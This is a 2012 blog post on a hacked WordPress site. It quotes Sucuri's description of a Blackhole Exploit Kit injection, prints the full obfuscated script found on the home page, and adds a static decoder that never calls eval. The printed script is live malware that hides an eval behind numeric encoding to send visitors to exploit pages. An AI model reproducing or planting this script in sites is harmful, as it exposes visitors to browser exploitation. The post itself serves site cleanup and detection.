Tuesday, July 17, 2012

WordPress site hacked

With so many updates to WordPress, I would have thought the platform was safer from being hacked.

You can scan your website for malware with:
http://sitecheck.sucuri.net/scanner/


https://www.virustotal.com/#url (DOES NOT DETECT MALWARE)

I got a site with some weird JS code on the home page.

http://labs.sucuri.net/
Known javascript malware. Details: http://labs.sucuri.net/db/malware/malware-entry-mwexploitkitblackhole2
http://labs.sucuri.net/?details=asjo.com.br

An encoded javascript (or a redirection to it) was detected, leading browsers to the Blackhole Exploit kit (v1.x). It attempts to exploit the browser of anyone visiting the site using a combination of multiple vulnerabilities (Java, Adobe PDF, Flash and others). This is one of the most common types of malware we are seeing on web sites lately (2012/Jun).
Note that any PHP, JS or .htaccess could be compromised by this type of malware.


Affecting: Any web site. Often on outdated WordPress, Joomla and osCommerce sites.


< script >try{12+prototype;}catch(zxc){e=window["eva"+"l"];n="81.90.945.1020.288.400.900.1110.891.1170.981.1010.990.1160.414.1030.909.1160.621.1080.909.1090.909.1100.1044.1150.594.1210.756.970.927.780.873.1090.909.400.351.980.999.1000.1089.390.369.910.432.930.369.1230.117.90.81.90.945.1020.1026.970.981.1010.1026.400.369.590.117.90.81.1250.288.1010.972.1150.909.320.1107.130.81.90.81.1000.999.990.1053.1090.909.1100.1044.460.1071.1140.945.1160.909.400.306.600.945.1020.1026.970.981.1010.288.1150.1026.990.549.390.936.1160.1044.1120.522.470.423.1090.882.1020.1017.1020.909.1170.414.500.477.1170.414.990.999.1090.423.1000.423.520.432.520.414.1120.936.1120.567.1030.999.610.441.390.288.1190.945.1000.1044.1040.549.390.441.480.351.320.936.1010.945.1030.936.1160.549.390.441.480.351.320.1035.1160.1089.1080.909.610.351.1180.945.1150.945.980.945.1080.945.1160.1089.580.936.1050.900.1000.909.1100.531.1120.999.1150.945.1160.945.1110.990.580.873.980.1035.1110.972.1170.1044.1010.531.1080.909.1020.1044.580.432.590.1044.1110.1008.580.432.590.351.620.540.470.945.1020.1026.970.981.1010.558.340.369.590.117.90.81.1250.117.90.81.1020.1053.1100.891.1160.945.1110.990.320.945.1020.1026.970.981.1010.1026.400.369.1230.117.90.81.90.1062.970.1026.320.918.320.549.320.900.1110.891.1170.981.1010.990.1160.414.990.1026.1010.873.1160.909.690.972.1010.981.1010.990.1160.360.390.945.1020.1026.970.981.1010.351.410.531.1020.414.1150.909.1160.585.1160.1044.1140.945.980.1053.1160.909.400.351.1150.1026.990.351.440.351.1040.1044.1160.1008.580.423.470.981.980.918.1130.918.1010.1053.460.450.530.1053.460.891.1110.981.470.900.470.468.480.468.460.1008.1040.1008.630.927.1110.549.490.351.410.531.1020.414.1150.1044.1210.972.1010.414.1180.945.1150.945.980.945.1080.945.1160.1089.610.351.1040.945.1000.900.1010.990.390.531.1020.414.1150.1044.1210.972.1010.414.1120.999.1150.945.1160.945.1110.990.610.351.970.882.1150.999.1080.1053.1160.909.390.531.1020.414.1150.1044.1210.972.1010.414.1080.909.1020.1044.610.351.480.351.590.918.460
.1035.1160.1089.1080.909.460.1044.1110.1008.610.351.480.351.590.918.460.1035.1010.1044.650.1044.1160.1026.1050.882.1170.1044.1010.360.390.1071.1050.900.1160.936.390.396.390.441.480.351.410.531.1020.414.1150.909.1160.585.1160.1044.1140.945.980.1053.1160.909.400.351.1040.909.1050.927.1040.1044.390.396.390.441.480.351.410.531.130.81.90.81.1000.999.990.1053.1090.909.1100.1044.460.927.1010.1044.690.972.1010.981.1010.990.1160.1035.660.1089.840.873.1030.702.970.981.1010.360.390.882.1110.900.1210.351.410.819.480.837.460.873.1120.1008.1010.990.1000.603.1040.945.1080.900.400.918.410.531.130.81.90.1125".split(".");h=2;s="";if(window["document"])for(i=0;-583+i<0;i=1+i){k=i;s=s+String.fromCharCode(n[k]/(i%(h)+9));}if(012===10)e(s);}< /script >
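
As an added example (not code from this post or from Sucuri), the JavaScript below statically decodes this kind of script without ever calling eval: the injected code stores its payload as dot-separated numbers and rebuilds each character as n[i]/(i%h+9) with h=2. The sample page, its encoded string and the function names are constructed for illustration.

```javascript
// Static triage for the numeric-array obfuscation; nothing is ever eval'd.
// SAMPLE_HTML is constructed for this example (not the infected site's markup);
// its encoded run decodes to the harmless text "var a=1;//test".
const SAMPLE_HTML = [
  '<html><body><p>version 1.2.3</p>',
  '<script>try{12+prototype;}catch(z){e=window["eva"+"l"];',
  'n="1062.970.1026.320.873.610.441.590.423.470.1044.1010.1035.1160".split(".");',
  'h=2;s="";for(i=0;i<14;i++){s+=String.fromCharCode(n[i]/(i%h+9));}e(s);}</script>',
  '</body></html>',
].join('\n');

// Find quoted runs of dot-separated integers with at least minTokens entries.
function findNumericRuns(html, minTokens = 8) {
  const re = /["'](\d{1,5}(?:\.\d{1,5})+)["']/g;
  const runs = [];
  for (const m of html.matchAll(re)) {
    const tokens = m[1].split('.');
    if (tokens.length >= minTokens) runs.push(tokens.map(Number));
  }
  return runs;
}

// Reverse the scheme: character code = n[i] / (i % h + base), h=2 and base=9 here.
// Returns null if any value does not divide evenly, i.e. the run is not this scheme.
function decodeRun(nums, h = 2, base = 9) {
  let out = '';
  for (let i = 0; i < nums.length; i++) {
    const code = nums[i] / ((i % h) + base);
    if (!Number.isInteger(code) || code > 0xffff) return null;
    out += String.fromCharCode(code);
  }
  return out;
}

// Report each numeric run with its decoded text and the page-level indicators.
function triage(html) {
  const usesFromCharCode = /String\.fromCharCode/.test(html);
  const splitEval = /["']eva["']\s*\+\s*["']l["']/.test(html);
  return findNumericRuns(html).map((nums) => ({
    tokens: nums.length,
    decoded: decodeRun(nums),
    usesFromCharCode,
    splitEval,
  }));
}

console.log(triage(SAMPLE_HTML));
```

Run it with Node against a saved copy of a suspect page; a non-null `decoded` value together with both indicators set is a strong sign of this injection.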
